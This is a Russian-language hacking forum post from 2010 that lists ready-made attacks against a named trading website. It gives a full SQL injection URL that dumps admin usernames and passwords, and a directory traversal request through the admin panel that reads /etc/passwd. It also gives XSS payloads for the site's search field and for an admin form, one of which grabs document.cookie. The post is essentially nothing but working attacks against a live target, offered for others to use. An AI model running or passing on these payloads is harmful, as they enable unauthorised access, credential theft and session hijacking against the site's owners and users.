Показать сообщение отдельно

  #12929  
Старый 31.08.2010, 20:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

SQL Injection

http://mec1rgqh.panontrade.com/offers.php?id=885+and+1=0+union+select+1,2,3,4,5,6 ,group_concat(es_admin_name,char(58),es_pwd),8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+esb2 b_admin&file=Products&prod=sell&uid=mec1rgqh

читалка

входим в админку(http://panontrade.com/admin)

http://panontrade.com/admin/manage_pages.php?curr_page=passwd&curr_subdir=../../../../../../../../../../etc

XSS

и конечно же xss

http://panontrade.com

в поле поиска пишем ">alert()

и еще один xss в админке, http://panontrade.com/admin/edit_link.php

в поле Contact Person пишем ">alert(document.cookie)
 
Ответить с цитированием